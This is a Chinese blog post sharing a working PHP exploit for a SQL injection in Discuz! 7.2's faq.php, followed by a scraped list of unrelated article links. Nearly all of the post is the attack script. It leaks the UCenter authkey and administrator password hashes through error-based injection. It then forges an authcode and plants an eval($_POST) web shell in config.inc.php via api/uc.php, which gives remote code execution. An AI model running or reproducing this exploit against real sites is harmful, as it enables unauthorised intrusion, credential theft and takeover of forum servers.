Discuz! 7.2 SQL注入exp

已经有人写出一些工具了,但是感觉不怎么好用,就自己写了个。

参数:
1.可直接getshell
2.爆管理账号密码
3.爆表前缀
如果表前缀不是默认的cdb_ 只需更改代码中的 $table即可,方便快捷。

下载地址:DZ7.2
附代码:

<?php
 
/**
  * @author: xiaoma
  * @blog  : www.i0day.com
  * @date  : 2014.7.2 23:1
  */
 
error_reporting (0);
set_time_limit(3000);
$host = $argv [1];
$path = $argv [2];
$js = $argv [3];
$timestamp = time()+10*3600;
$table = "cdb_" ; //表名
 
if ( $argc < 2) {
     print_r('
   ********************************************************
   *  Discuz faq.php SQL Injection Exp                    *
   *  ---------By:Www.i0day.com-----------               *
   *     Usage: php '.$argv[0].' url 1                    *
   *  -------------------------------------               *
   *  js选项: 1.GetShell 2.取密码 3.查表前缀              *
   *                                                      *
   *   php '.$argv[0].' Www.i0day.com / 1                    *
   *   php '.$argv[0].' Www.i0day.com /dz72/ 1               *
   *                                                      *
   *                                                      *
   ********************************************************
      ');
      exit ;
}
if ( $js ==1){
     $sql = "action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x3a3a,(select%20length(authkey)%20from%20" . $table . "uc_applications%20limit%200,1),0x3a3a)x%20from%20information_schema.tables%20group%20by%20x)a)%23" ;
     $resp = sendpack( $host , $path , $sql );
 
     if ( strpos ( $resp , "::" )==-1){
         echo '表前缀可能不是默认cdb_ 请先查看表前缀!' ;
     } else {
     preg_match( "/::(.*)::/" , $resp , $matches );
     $lenght = intval ( $matches [1]);
     if ( $lenght ){
         if ( $lenght <=124){
             $sql = "action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x5E,(select%20substr(authkey,1,62)%20from%20" . $table . "uc_applications%20limit%200,1))x%20from%20information_schema.tables%20group%20by%20x)a)%23" ;
             $resp = sendpack( $host , $path , $sql );
             if ( strpos ( $resp , "1\^" )!=-1){
                 preg_match( "/1\^(.*)\'/U" , $resp , $key1 );
             $sql = "action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x5E,(select%20substr(authkey,63,62)%20from%20" . $table . "uc_applications%20limit%200,1))x%20from%20information_schema.tables%20group%20by%20x)a)%23" ;
             $resp = sendpack( $host , $path , $sql );
             preg_match( "/1\^(.*)\'/U" , $resp , $key2 );
             $key = $key1 [1]. $key2 [1];
             $code =urlencode(_authcode( "time=$timestamp&action=updateapps" , 'ENCODE' , $key ));
             $cmd1 ='<?xml version= "1.0" encoding= "ISO-8859-1" ?>
<root>
  <item id= "UC_API" >bbs.49you.com\'); eval ( $_POST [i0day]); //</item>
</root>';
             $cmd2 ='<?xml version= "1.0" encoding= "ISO-8859-1" ?>
<root>
  <item id= "UC_API" >bbs.49you.com</item>
</root>';
             $html1 = send( $cmd1 );
             $res1 = substr ( $html1 ,-1);
             $html2 = send( $cmd2 );
             $res2 = substr ( $html1 ,-1);
             if ( $res1 == '1' && $res2 == '1' ){
             echo "shell地址:http://" . $host . $path . 'config.inc.php   pass:i0day' ;
             }
             } else {
                 echo '获取失败' ;
             }
         }
     }
    }       
 
} elseif ( $js ==2){
     $sql = "action=grouppermission&gids[99]=%27&gids[100][0]=%29%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28%28select%20concat%280x5E5E5E,username,0x3a,password,0x3a,salt%29%20from%20" . $table . "uc_members%20limit%200,1%29,floor%28rand%280%29*2%29,0x5E%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23" ;
     $resp = sendpack( $host , $path , $sql );
     if ( strpos ( $resp , "\^\^\^" )!=-1){
         preg_match( "/\^\^\^(.*)\^/U" , $resp , $password );
         echo '密码:' . $password [1];
         } else {
             echo '表前缀可能不是默认cdb_ 请先查看表前缀!' ;
         }
} elseif ( $js ==3){
     $sql = "action=grouppermission&gids[99]='&gids[100][0]=)%20and%20(select%201%20from%20(select%20count(*),concat(floor(rand(0)*2),0x5E,(select%20hex(table_name)%20from%20information_schema.tables%20where%20table_schema=database()%20limit%201,1),0x5E)x%20from%20information_schema%20.tables%20group%20by%20x)a)%23" ;
     $resp = sendpack( $host , $path , $sql );
     if ( strpos ( $resp , "1\^" )!=-1){
         preg_match( "/1\^(.*)\^/U" , $resp , $t );
 
         if ( strpos ( $t [1], "cdb_" )!=-1){
             echo "表名为:" .hex2str( $t [1]). " 表前缀为默认cdb_ 无需修改" ;
         } else {
             echo "表名:" .hex2str( $t [1]). ' 不是默认表名cdb_请自行修改代码中的$table' ;
         }
     } else {
         echo "查看表前缀失败,Sorry" ;
     }
} else {
     echo "未选择脚本功能" ;
}
 
function sendpack( $host , $path , $sql , $js ){
        $data = "GET " . $path . "/faq.php?" . $sql . " HTTP/1.1\r\n" ;
         $data .= "Host:" . $host . "\r\n" ;
         $data .= "User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:20.0) Gecko/20100101 Firefox/20.0\r\n" ;
         $data .= "Connection: close\r\n\r\n" ;
         //$data.=$html."\r\n";
         $ock = fsockopen ( $host ,80);
 
         if (! $ock ){
         echo "No response from " . $host ;
         die ();
 
         }
         fwrite( $ock , $data );
 
         $resp = '' ;
 
         while (! feof ( $ock )) {
 
                 $resp .= fread ( $ock , 1024);
                 }
 
         return $resp ;
 
}
function send( $cmd ){
     global $host , $code , $path ;
     $message = "POST " . $path . "/api/uc.php?code=" . $code . "  HTTP/1.1\r\n" ;
     $message .= "Accept: */*\r\n" ;
     $message .= "Referer: " . $host . "\r\n" ;
     $message .= "Accept-Language: zh-cn\r\n" ;
     $message .= "Content-Type: application/x-www-form-urlencoded\r\n" ;
     $message .= "User-Agent: Mozilla/4.0 (compatible; MSIE 6.00; Windows NT 5.1; SV1)\r\n" ;
     $message .= "Host: " . $host . "\r\n" ;
     $message .= "Content-Length: " . strlen ( $cmd ). "\r\n" ;
     $message .= "Connection: Close\r\n\r\n" ;
     $message .= $cmd ;
 
     //var_dump($message);
     $fp = fsockopen ( $host , 80);
     fputs ( $fp , $message );
 
     $resp = '' ;
 
     while ( $fp && ! feof ( $fp ))
         $resp .= fread ( $fp , 1024);
 
     return $resp ;
}
 
function _authcode( $string , $operation = 'DECODE' , $key = '' , $expiry = 0) {
     $ckey_length = 4;
 
     $key = md5( $key ? $key : UC_KEY);
     $keya = md5( substr ( $key , 0, 16));
     $keyb = md5( substr ( $key , 16, 16));
     $keyc = $ckey_length ? ( $operation == 'DECODE' ? substr ( $string , 0, $ckey_length ): substr (md5(microtime()), - $ckey_length )) : '' ;
 
     $cryptkey = $keya .md5( $keya . $keyc );
     $key_length = strlen ( $cryptkey );
 
     $string = $operation == 'DECODE' ? base64_decode ( substr ( $string , $ckey_length )) : sprintf( '%010d' , $expiry ? $expiry + time() : 0). substr (md5( $string . $keyb ), 0, 16). $string ;
     $string_length = strlen ( $string );
 
     $result = '' ;
     $box = range(0, 255);
 
     $rndkey = array ();
     for ( $i = 0; $i <= 255; $i ++) {
         $rndkey [ $i ] = ord( $cryptkey [ $i % $key_length ]);
     }
 
     for ( $j = $i = 0; $i < 256; $i ++) {
         $j = ( $j + $box [ $i ] + $rndkey [ $i ]) % 256;
         $tmp = $box [ $i ];
         $box [ $i ] = $box [ $j ];
         $box [ $j ] = $tmp ;
     }
 
     for ( $a = $j = $i = 0; $i < $string_length ; $i ++) {
         $a = ( $a + 1) % 256;
         $j = ( $j + $box [ $a ]) % 256;
         $tmp = $box [ $a ];
         $box [ $a ] = $box [ $j ];
         $box [ $j ] = $tmp ;
         $result .= chr (ord( $string [ $i ]) ^ ( $box [( $box [ $a ] + $box [ $j ]) % 256]));
     }
 
     if ( $operation == 'DECODE' ) {
         if (( substr ( $result , 0, 10) == 0 || substr ( $result , 0, 10) - time() > 0) && substr ( $result , 10, 16) == substr (md5( substr ( $result , 26). $keyb ), 0, 16)) {
             return substr ( $result , 26);
         } else {
                 return '' ;
             }
     } else {
         return $keyc . str_replace ( '=' , '' , base64_encode ( $result ));
     }
 
}
function hex2str( $hex ){
     $str = '' ;
     $arr = str_split ( $hex , 2);
     foreach ( $arr as $bit ){
         $str .= chr (hexdec( $bit ));
     }
     return $str ;
     }
?>

转载文章请注明,转载自:小马's Blog http://www.i0day.com

本文链接: http://www.i0day.com/1756.html

你可能感兴趣的:(discuz)

  • discuz discuz_admincp.php 讲解,Discuz! 1.5-2.5 命令执行漏洞分析(CVE-2018-14729) weixin_39740419 discuz讲解
    0x00漏洞简述漏洞信息8月27号有人在GitHub上公布了有关Discuz1.5-2.5版本中后台数据库备份功能存在的命令执行漏洞的细节。漏洞影响版本Discuz!1.5-2.50x01漏洞复现官方论坛下载相应版本就好。0x02漏洞分析需要注意的是这个漏洞其实是需要登录后台的,并且能有数据库备份权限,所以比较鸡肋。我这边是用Discuz!2.5完成漏洞复现的,并用此进行漏洞分析的。漏洞点在:so
  • CVE-2020-24186 WordPress评论插件wpDiscuz任意文件上传漏洞 sukusec
    0x00漏洞介绍Wordfence的威胁情报团队在一款名叫wpDiscuz的Wordpress评论插件(wpDiscuz是WordPress功能丰富的评论系统插件,可充实网站评论部分)中发现了一个高危漏洞,此漏洞将允许未经认证的攻击者在目标站点中上传任意文件,从而实现远程代码执行。0x01漏洞环境WordPress的gVectorswpDiscuz插件7.0至7.0.4版本中存在远程代码执行漏洞,
  • DZ主题模板 Discuz迪恩淘宝客购物风格商业版模板 818源码资源站 源码下载00818.cn源码下载818资源站php前端
    Discuz淘宝客网站模板,迪恩淘宝客购物风格商业版模板。版本支持:discuzx3.0版本,discuzx3.1版本,discuzx3.2版本。包括网站首页,论坛首页,论坛列表页,论坛内容页,论坛瀑布流,频道列表页,频道内容页(支持多个)。模板论坛首页,列表页,内容页,以及文章页面数据采用DIY数据读取,方便新手老手运营以及后期维护,时尚大气简洁。模板添加了不少处动画效果,增加用户体验和粘度。模
  • 安装笔记:docker安装discuz 孙承云 linuxdockerdocker数据库mysql
    docker安装discuz查询discuz镜像版本,选第一个dockersearchdiscuz下载镜像dockerpulldocker.io/tencentci/discuz启动discuz镜像,名称:BCB_BBS,外部8000端口映射到内部80端口dockerrun--nameBCB_BBS-d-p8000:80tencentci/discuz访问主机地址8000端口,出现下面画面:htt
  • discuzQ后台 配置腾讯云API的时候提示错误 技术服务团队 linux运维服务器bug
    cURLerror56:OpenSSLSSL_read:Connectionresetbypeer,errno104discuzQ后台配置腾讯云API的时候提示错误解决方法
  • 开始从 discuzX3.4 迁移到 nodebb(二)
    (续)3、连接mysql,mongodb传导数据**用户数据字段对照表:**nodebb例子数据//作用说明discuzX字段discuzX表名OK"_id"ObjectId("65cb8801e09f69ff71141520"),[x]"_key"user:2//2通常等于uid"joindate"1707837441083,regdatepre2_common_member[x]"laston
  • 开始从 discuzX3.4 迁移到 nodebb(零) discuz论坛
    论坛这事儿论坛这东西现在已经变得非常的小众,我玩论坛始于25年前(暴露了年龄哈哈),现在逛论坛的时间并不多了,最多看看知乎或者公众号文章,也会偶尔跟着潮流制作一些视频。慢慢发现,好的内容还是很受大家欢迎,一个好的视频内容(不是只流量大的)其实也要有好的文案。本人写东西也只是才是这几年的事,偶尔在实体杂志上写一小方块东西。码字是很花时间的,但也是对自己知识和智慧的集中考验。论坛相对于公众号文章和即时
  • 开始从 discuzX3.4 迁移到 nodebb(二)
    (续)3、连接mysql,mongodb传导数据**用户数据字段对照表:**nodebb例子数据//作用说明discuzX字段discuzX表名OK"_id"ObjectId("65cb8801e09f69ff71141520"),[x]"_key"user:2//2通常等于uid"joindate"1707837441083,regdatepre2_common_member[x]"laston
  • 开始从 discuzX3.4 迁移到 nodebb(一)
    首先要了解下discuzX3.4和nodebb的数据库结构,discuzX用的是mysql,nodebb用的是mongodb。最重要的当然是用户相关的数据表和帖子数据表。discuzX能查到数据表字典,nodebb只能自己用mongodb的admin工具看了。一、用户数据1、nodebb和discuz数据表的对照Nodebb用户表须用的数据(字段):db.objects.findOne({user
  • [转]用python爬虫抓站的一些技巧总结 juunnry pythonwebcrawler
    来源网站:http://www.pythonclub.org/python-network-application/observer-spider学用python也有3个多月了,用得最多的还是各类爬虫脚本:写过抓代理本机验证的脚本,写过在discuz论坛中自动登录自动发贴的脚本,写过自动收邮件的脚本,写过简单的验证码识别的脚本,本来想写googlemusic的抓取脚本的,结果有了强大的gmbox,
  • 如何在Win系统部署Wnmp服务实现远程访问内网本地服务 秋说 内网穿透内网穿透winwnmp
    文章目录前言1.Wnmp下载安装2.Wnmp设置3.安装cpolar内网穿透3.1注册账号3.2下载cpolar客户端3.3登录cpolarwebui管理界面3.4创建公网地址4.固定公网地址访问前言WNMP是Windows系统下的绿色Nginx+Mysql+PHP环境集成套件包,安装完成后即可得到一个Nginx+MySQL+PHP环境,常用来搭建动态网站或者服务器。可直接安装Discuz!,PH
  • c语言程序ising算法,算法及编程语言 - 声振论坛 - 振动,动力学,声学,信号处理,故障诊断 - Powered by Discuz!... 什么斯坦 c语言程序ising算法
    给一下该书的详细信息吧《运筹学基础》作者:张莹出版社:清华大学出版社出版日期:版次:ISBN:730201669页数:311开本:16开包装:平装原价:¥24.0本书包括运筹学中最基本、应用最广泛的七个部分:线性规划、整数规划、目标规划、非线性规划、动态规划、图与网络分析、决策分析。其中以线性规划、非线性规划为重点。全书七部分共详细介绍了50余种实用算法,配有近百个不同类型、不同解法的例题,还有结
  • CentOs 7 搭建论坛BBS Discuz_X3.2 zwb_jianshu
    由于公司项目需要一个互动平台,可以发起活动,发消息留言,讨论过后发现这竟然是一个论坛的功能。于是就不打算耗费功夫开发相关功能,直接另外搭一套BBS算球。。。一直觉得搭建BBS不是一件难事,目前有很多成熟的产品都支持直接建站,找了一些资料看了后发现还是需要很多知识和架构的,下面是详细的搭建过程重新安装了一台CentOs7虚拟机,安装过程资料很多,大家去搜索下系统配置相关系统版本:CentOS-7-x
  • 老司机用脚本批量巧删恶意文件 4/5$全真龙门 服务器运维
    作者:田逸(formyz)一个NFS服务器,为多个Web项目所共享。这些目录包括PHP程序、图片、HTML页面和用户上传的文档和附件等。因为某些Web框架古老,存在诸如不对上传文件做严格的安全性检查,虽然此NFS服务器位于受保护的内部网络,但任然被别有用心的人上传了大量的恶意文件。强烈要求程序员进行程序(Discuz)更新,答复说更新难度太大,无法在程序上进行处理。从系统管理层面上,临时的措施仅仅
  • 《安富莱嵌入式周报》第231期:2021.09.20--2021.09.26 硬汉嵌入式 嵌入式周报stm32物联网
    往期周报汇总地址:嵌入式周报-uCOS&uCGUI&emWin&embOS&TouchGFX&ThreadX-硬汉嵌入式论坛-PoweredbyDiscuz!http://www.armbbs.cn/forum.php?mod=forumdisplay&fid=12&filter=typeid&typeid=104目录1、elements消息:全球十大电动车制造商,国产宁德时代32.5%市场份额,
  • 43 漏洞发现-WEB应用之漏洞探针类型利用修复 山兔1 小迪安全前端
    目录已知CMS开发框架末知CMS演示案例:开发框架类源码渗透测试报告-资讯-thinkphp开发框架类源码渗透测试-咨讯-spring已知CMS非框架类渗透测试报告-工具脚本-wordpress已知CMS非框架类渗透测试报告-代码审计-qqyewu_php未知CMS非框架类渗透测试报告-人工-你我都爱的wg哦~已知CMS如常见的dedecms.discuz,wordpress等源码结构,它们都有一
  • 推荐一个好看的极简主义博客网站程序-liveblog lytcreatee Liveblogpythondjangomysqlhtml5
    以前呢,一直想搭建一个属于自己的博客系统,喜欢网站的所有的内容,所有的权限都可以归属于自己,不是很喜欢微博这种开放性平台,只想把自己的想法、心情记录在某个安静的角落。后来,尝试过很多的网站程序或者主题,dede,discuz,hadsky,lightsns,emblog等等,发现这些程序或者主题都很有特色,但是一直没有自己想要的那种感觉-只是想要寻找一片干净、整洁的净土,不需要多么的复杂,功能多么
  • Discuz论坛搭建:Linux宝塔面板一键部署,固定地址畅享公网访问 聆风吟_ Cpolar杂谈linux运维网络服务器
    个人主页:聆风吟系列专栏:网络奇遇记、Cpolar杂谈少年有梦不应止于心动,更要付诸行动。文章目录前言一.安装基础环境二.一键部署Discuz三.安装cpolar工具四.配置域名访问Discuz五.固定域名公网地址六.配置Discuz论坛结语前言CrossdayDiscuz!Board(以下简称Discuz!)是一套通用的社区论坛软件系统,用户可以在不需要任何编程的基础上,通过简单的设置和安装,在
  • 《安富莱嵌入式周报》第331期:单片机实现全功能软件无线电,开源电源EEZ升级主控,ARM 汇编用户指南,UDS统一诊断服务解析,半导体可靠性设计手册 硬汉嵌入式 嵌入式周报单片机开源arm开发
    周报汇总地址:嵌入式周报-uCOS&uCGUI&emWin&embOS&TouchGFX&ThreadX-硬汉嵌入式论坛-PoweredbyDiscuz!目录:1、单片机实现低配版全功能软件无线电,范围0.5-30MHz,支持SSB、AM、FM和CW2、TI整理的ARM汇编用户指南3、ADI差分链路的SPI扩展器LTC4332,支持1200米4、开源串口,SPI,I2C和1-Wire开发工具5、软
  • 腾讯云服务器如何安装Discuz! Q?推荐使用Discuz! Q官方镜像 boke112百科 服务器答疑
    腾讯云已经发布了全新的Discuz!Q,如果你使用的是腾讯云服务器,那么我们完全可以通过重装系统直接选择“Discuz!Q官方镜像”,系统重新安装成功后,Discuz!Q即可快速安装,不再需要自己进行配置。1.打开腾讯云官网并登录进入控制台>>点击“最近访问”栏目中的“云服务器”进入到我们想要更换系统的云服务器>>点击实例右侧的“更多>重装系统”>>在弹出的“重装系统须知”对话框中点击【确定,开始
  • discuz java版_discuz加密解密函数 java版 几乎太累了 discuzjava版
    简介:这是discuz加密解密函数java版的详细页面,介绍了和php,java,php,securitydiscuz加密解密函数java版有关的知识、技巧、经验,和一些php源码等。class='pingjiaF'frameborder='0'src='http://biancheng.dnbcw.info/pingjia.php?id=358618'scrolling='no'>最近做一个项目
  • Discuz!生成微信、QQ、支付宝、头条抖音及百度小程序 WordPress小程序
    大数据时代,个人信息越来越透明,以至于手机APP都能读懂你我的心思,甚至能将信息精准地送达到每一个移动端。APP开发者将其称之为“算法推荐”,商家将其称之为“个性化定制”。有人为推荐机制津津乐道,“原来手机比男朋友更懂我”,听到更多合口味的音乐,看更多爱好的视频;也有人感叹其恐怖,担心陷入算法布局好的陷阱,陷入信息茧房。价值巨大的推荐系统虽然我们开始警惕推荐机制可能带来的危害,但对于企业而言,推荐
  • Discuz 安装全流程 CentOS + Docker + PHP + Nginx + Mariadb 叼辣条闯天涯 杂七杂八docker
    仅供技术研究,并非最简单的Discuz安装方法文章目录1Docker安装2MariaDB安装3PHP安装4Nginx安装5Discuz安装5.1安装文件部署5.2安装5.3GD图像处理软件安装5.4附件上传失败问题5.5域名HTTPSSSL配置系统环境:CentOS8Stream远程SSH工具:FinalShell4.9.4PHP版本:7.2-fpmDiscuz版本:Discuz_X3.4_SC_
  • 使用腾讯云搭建discuz论坛教程(上) 嗡嗡嗡qwq 腾讯云云计算
    搭建一个论坛,聚集大家的问题,反馈,或者相反。一开始我是有些摸不着头脑,去discuz官网找了很多的方法,但是这是不对的,你需要在服务器上面进行搭建,这样关机还能访问,如果你是企业需求,可以注册一个域名,然后进行备案。腾讯云:https://console.cloud.tencent.com/在腾讯云和阿里云的对比下,最后我选择了腾讯云,因为需求不是特别高。需要你去选择操作系统,时间,我这里买的是
  • discuz论坛附件上传限制大小2MB 嗡嗡嗡qwq 腾讯云论文阅读
    我遇到了这个问题,去修改了配置PHP.ini文件没有解决.我把他变成2000M依旧没有用,然后我选择了用户组,附件部分。如图所示:然后这个时候我还是没有好,我同事的却不限制大小了,我去清理缓存,无效,最后我又研究了一下,我不是会员,我是管理员呀,然后修改管理员权限就好了。成果展示:
  • 如何使用宝塔面板搭建Discuz论坛服务并结合内网穿透远程访问 Yawesh cpolar数据库
    文章目录前言1.安装基础环境2.一键部署Discuz3.安装cpolar工具4.配置域名访问Discuz5.固定域名公网地址6.配置Discuz论坛前言CrossdayDiscuz!Board(以下简称Discuz!)是一套通用的社区论坛软件系统,用户可以在不需要任何编程的基础上,通过简单的设置和安装,在互联网上搭建起具备完善功能、很强负载能力和可高度定制的论坛服务。下面我们在Linux上使用宝塔
  • 如何在Windows安装Wnmp服务并实现固定地址远程访问 老秦包你会 其他
    文章目录前言1.Wnmp下载安装2.Wnmp设置3.安装cpolar内网穿透3.1注册账号3.2下载cpolar客户端3.3登录cpolarwebui管理界面3.4创建公网地址4.固定公网地址访问前言WNMP是Windows系统下的绿色Nginx+Mysql+PHP环境集成套件包,安装完成后即可得到一个Nginx+MySQL+PHP环境,常用来搭建动态网站或者服务器。可直接安装Discuz!,PH
  • Discuz! X3.4 正式版 简体中文 酷爱码 phpdiscuz论坛源码php
    建设论坛首选源码模板,一直受到很多人的喜爱,很多论坛都是以这个为模板,进行美化。这个是最新版的。Discuz!X3.4在继承和完善Discuz!X3.3的基础上,针对PHP7进行了优化。对于X3.2用户来说,X3.3已继承了X3.2的补丁修复工作。安全稳定的程序为站长提供更加可靠的保障。简要:平台环境:PHP/Mysql文件大小:11.3MB语言:简体中文编码:utf-8/gbk安装步骤:解压文件
  • PHP架构入门你了解么 八重樱勿忘
    最早接触到PHP是在去年想做个人网站的时候,那时候也接触并搭建了WordPress主题,Discuz论坛,织梦等内容管理系统(CMS,ContentManagementSystem)。而这些框架或者产品都是用PHP做的,从而可以看出PHP在特定领域内还是发挥了大的作用并得到追随。“世界上最好的语言”也被作为一个梗在程序员圈子里传播。对于开发人员来说,语言相比业务而言是次要的(当然,如果你不想做开发
  • 网站换服务器 备案,网站换服务器备案吗 Catsoul喵魂 网站换服务器备案
    网站换服务器备案吗内容精选换一换如果您需要使用创建的云服务器搭建一个对外展示的网站或者Web应用程序,请按以下步骤进行相关的配置操作。建站参考如果您使用的是公共镜像创建的云服务器,那么购买完成后可以参考以下建站指导完成完网站或应用程序的搭建。搭建WordPress博客平台,请参考部署WordPress博客系统搭建Discuz论坛平台,请参考搭建Discuz论坛网站。更使用华为云备案系统时,全国互联
  • TOMCAT在POST方法提交参数丢失问题 357029540 javatomcatjsp
    摘自http://my.oschina.net/luckyi/blog/213209 昨天在解决一个BUG时发现一个奇怪的问题,一个AJAX提交数据在之前都是木有问题的,突然提交出错影响其他处理流程。 检查时发现页面处理数据较多,起初以为是提交顺序不正确修改后发现不是由此问题引起。于是删除掉一部分数据进行提交,较少数据能够提交成功。 恢复较多数据后跟踪提交FORM DATA ,发现数
  • 在MyEclipse中增加JSP模板 删除-2008-08-18 ljy325 jspxmlMyEclipse
    在D:\Program Files\MyEclipse 6.0\myeclipse\eclipse\plugins\com.genuitec.eclipse.wizards_6.0.1.zmyeclipse601200710\templates\jsp  目录下找到Jsp.vtl,复制一份,重命名为jsp2.vtl,然后把里面的内容修改为自己想要的格式,保存。 然后在 D:\Progr
  • JavaScript常用验证脚本总结 eksliang JavaScriptjavaScript表单验证
         转载请出自出处:http://eksliang.iteye.com/blog/2098985        下面这些验证脚本,是我在这几年开发中的总结,今天把他放出来,也算是一种分享吧,现在在我的项目中也在用!包括日期验证、比较,非空验证、身份证验证、数值验证、Email验证、电话验证等等...! &nb
  • 微软BI(4) 18289753290 微软BI SSIS
    1) Q:查看ssis里面某个控件输出的结果:  A MessageBox.Show(Dts.Variables["v_lastTimestamp"].Value.ToString()); 这是我们在包里面定义的变量 2):在关联目的端表的时候如果是一对多的关系,一定要选择唯一的那个键作为关联字段。 3) Q:ssis里面如果将多个数据源的数据插入目的端一
  • 定时对大数据量的表进行分表对数据备份 酷的飞上天空 大数据量
    工作中遇到数据库中一个表的数据量比较大,属于日志表。正常情况下是不会有查询操作的,但如果不进行分表数据太多,执行一条简单sql语句要等好几分钟。。   分表工具:linux的shell + mysql自身提供的管理命令 原理:使用一个和原表数据结构一样的表,替换原表。   linux shell内容如下: =======================开始 
  • 本质的描述与因材施教 永夜-极光 感想随笔
             不管碰到什么事,我都下意识的想去探索本质,找寻一个最形象的描述方式。        我坚信,世界上对一件事物的描述和解释,肯定有一种最形象,最贴近本质,最容易让人理解        &
  • 很迷茫。。。 随便小屋 随笔
    小弟我今年研一,也是从事的咱们现在最流行的专业(计算机)。本科三流学校,为了能有个更好的跳板,进入了考研大军,非常有幸能进入研究生的行业(具体学校就不说了,怕把学校的名誉给损了)。   先说一下自身的条件,本科专业软件工程。主要学习就是软件开发,几乎和计算机没有什么区别。因为学校本身三流,也就是让老师带着学生学点东西,然后让学生毕业就行了。对专业性的东西了解的非常浅。就那学的语言来说
  • 23种设计模式的意图和适用范围 aijuans 设计模式
    Factory Method 意图 定义一个用于创建对象的接口,让子类决定实例化哪一个类。Factory Method 使一个类的实例化延迟到其子类。   适用性 当一个类不知道它所必须创建的对象的类的时候。   当一个类希望由它的子类来指定它所创建的对象的时候。   当类将创建对象的职责委托给多个帮助子类中的某一个,并且你希望将哪一个帮助子类是代理者这一信息局部化的时候。 Abstr
  • Java中的synchronized和volatile aoyouzi javavolatilesynchronized
    说到Java的线程同步问题肯定要说到两个关键字synchronized和volatile。说到这两个关键字,又要说道JVM的内存模型。JVM里内存分为main memory和working memory。 Main memory是所有线程共享的,working memory则是线程的工作内存,它保存有部分main memory变量的拷贝,对这些变量的更新直接发生在working memo
  • js数组的操作和this关键字 百合不是茶 js数组操作this关键字
    js数组的操作;   一:数组的创建: 1、数组的创建 var array = new Array(); //创建一个数组 var array = new Array([size]); //创建一个数组并指定长度,注意不是上限,是长度 var arrayObj = new Array([element0[, element1[, ...[, elementN]]]
  • 别人的阿里面试感悟 bijian1013 面试分享工作感悟阿里面试
    原文如下:http://greemranqq.iteye.com/blog/2007170         一直做企业系统,虽然也自己一直学习技术,但是感觉还是有所欠缺,准备花几个月的时间,把互联网的东西,以及一些基础更加的深入透析,结果这次比较意外,有点突然,下面分享一下感受吧!    &nb
  • 淘宝的测试框架Itest Bill_chen springmaven框架单元测试JUnit
    Itest测试框架是TaoBao测试部门开发的一套单元测试框架,以Junit4为核心, 集合DbUnit、Unitils等主流测试框架,应该算是比较好用的了。 近期项目中用了下,有关itest的具体使用如下: 1.在Maven中引入itest框架: <dependency>   <groupId>com.taobao.test</groupId&g
  • 【Java多线程二】多路条件解决生产者消费者问题 bit1129 java多线程
    package com.tom; import java.util.LinkedList; import java.util.Queue; import java.util.concurrent.ThreadLocalRandom; import java.util.concurrent.locks.Condition; import java.util.concurrent.loc
  • 汉字转拼音pinyin4j 白糖_ pinyin4j
    以前在项目中遇到汉字转拼音的情况,于是在网上找到了pinyin4j这个工具包,非常有用,别的不说了,直接下代码:   import java.util.HashSet; import java.util.Set; import net.sourceforge.pinyin4j.PinyinHelper; import net.sourceforge.pinyin
  • org.hibernate.TransactionException: JDBC begin failed解决方案 bozch ssh数据库异常DBCP
    org.hibernate.TransactionException: JDBC begin failed:     at org.hibernate.transaction.JDBCTransaction.begin(JDBCTransaction.java:68)    at org.hibernate.impl.SessionImp
  • java-并查集(Disjoint-set)-将多个集合合并成没有交集的集合 bylijinnan java
    import java.util.ArrayList; import java.util.Arrays; import java.util.HashMap; import java.util.HashSet; import java.util.Iterator; import java.util.List; import java.util.Map; import java.ut
  • Java PrintWriter打印乱码 chenbowen00 java
    一个小程序读写文件,发现PrintWriter输出后文件存在乱码,解决办法主要统一输入输出流编码格式。 读文件: BufferedReader 从字符输入流中读取文本,缓冲各个字符,从而提供字符、数组和行的高效读取。 可以指定缓冲区的大小,或者可使用默认的大小。大多数情况下,默认值就足够大了。 通常,Reader 所作的每个读取请求都会导致对基础字符或字节流进行相应的读取请求。因
  • [天气与气候]极端气候环境 comsci 环境
          如果空间环境出现异变...外星文明并未出现,而只是用某种气象武器对地球的气候系统进行攻击,并挑唆地球国家间的战争,经过一段时间的准备...最大限度的削弱地球文明的整体力量,然后再进行入侵......      那么地球上的国家应该做什么样的防备工作呢?  &n
  • oracle order by与union一起使用的用法 daizj UNIONoracleorder by
    当使用union操作时,排序语句必须放在最后面才正确,如下: 只能在union的最后一个子查询中使用order by,而这个order by是针对整个unioning后的结果集的。So: 如果unoin的几个子查询列名不同,如 Sql代码  select supplier_id, supplier_name  from suppliers  UNI
  • zeus持久层读写分离单元测试 deng520159 单元测试
    本文是zeus读写分离单元测试,距离分库分表,只有一步了.上代码: 1.ZeusMasterSlaveTest.java package com.dengliang.zeus.webdemo.test; import java.util.ArrayList; import java.util.List; import org.junit.Assert; import org.j
  • Yii 截取字符串(UTF-8) 使用组件 dcj3sjt126com yii
    1.将Helper.php放进protected\components文件夹下。 2.调用方法:   Helper::truncate_utf8_string($content,20,false);   //不显示省略号  Helper::truncate_utf8_string($content,20);  //显示省略号  &n
  • 安装memcache及php扩展 dcj3sjt126com PHP
    安装memcache    tar zxvf memcache-2.2.5.tgz     cd memcache-2.2.5/     /usr/local/php/bin/phpize (?)    ./configure --with-php-confi
  • JsonObject 处理日期 feifeilinlin521 javajsonJsonOjbectJsonArrayJSONException
        写这边文章的初衷就是遇到了json在转换日期格式出现了异常 net.sf.json.JSONException: java.lang.reflect.InvocationTargetException  原因是当你用Map接收数据库返回了java.sql.Date 日期的数据进行json转换出的问题话不多说  直接上代码  &n
  • Ehcache(06)——监听器 234390216 监听器listenerehcache
    监听器          Ehcache中监听器有两种,监听CacheManager的CacheManagerEventListener和监听Cache的CacheEventListener。在Ehcache中,Listener是通过对应的监听器工厂来生产和发生作用的。下面我们将来介绍一下这两种类型的监听器。  
  • activiti 自带设计器中chrome 34版本不能打开bug的解决 jackyrong Activiti
      在acitivti modeler中,如果是chrome 34,则不能打开该设计器,其他浏览器可以, 经证实为bug,参考 http://forums.activiti.org/content/activiti-modeler-doesnt-work-chrome-v34 修改为,找到 oryx.debug.js 在最头部增加 if (!Document.
  • 微信收货地址共享接口-终极解决 laotu5i0 微信开发
